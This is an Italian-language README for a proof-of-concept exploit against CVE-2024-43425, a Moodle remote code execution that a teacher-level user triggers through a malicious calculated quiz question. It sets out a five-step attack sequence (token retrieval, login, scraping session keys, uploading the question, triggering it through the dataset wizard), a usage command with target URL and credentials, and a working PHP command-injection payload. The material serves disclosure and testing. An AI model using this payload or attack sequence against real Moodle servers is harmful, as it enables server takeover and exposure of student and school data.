
Exploit proof-of-concept per CVE-2024-43425, che dimostra l'esecuzione remota di codice autenticata in Moodle tramite il caricamento di domande calcolate malevole.
CVE Overview CVE ID: CVE-2024-43425
Descrizione: Moodle consente a un utente autenticato di livello insegnante di caricare una domanda calcolata malevola tramite l'interfaccia dell'editor dei quiz. Impatto: Remote Code Execution (RCE) Causa: Sanitizzazione impropria dei payload matematici all'interno delle domande calcolate, che porta all'iniezione di comandi tramite la procedura guidata del dataset.
##Requisiti:
##Questo script esegue un attacco in 5 fasi:
Step Descrizione 1️ Recupera il token di login (logintoken) 2️ Effettua il login e stabilisci una MoodleSession valida 3️ Estrai sesskey, ctxid e category dalla pagina di modifica del quiz 4️ Carica una domanda calcolata appositamente creata con un payload RCE 5️ Attiva il payload tramite la pagina della procedura guidata del dataset
##Istruzioni per l'uso
Requisiti: Python 3 Librerie Python: requests, bs4 (BeautifulSoup)
pip3 install requests bs4
python3 exploit_cve_2024_43425.py \
--url http://192.168.2.12/moodle \
--username test \
--password 'Test@123' \
--courseid 1 \
--cmid 1 \
--cmd 'whoami'
##Payload utilizzato:
answer[0] = "(1)->{system($_GET[chr(97)])}"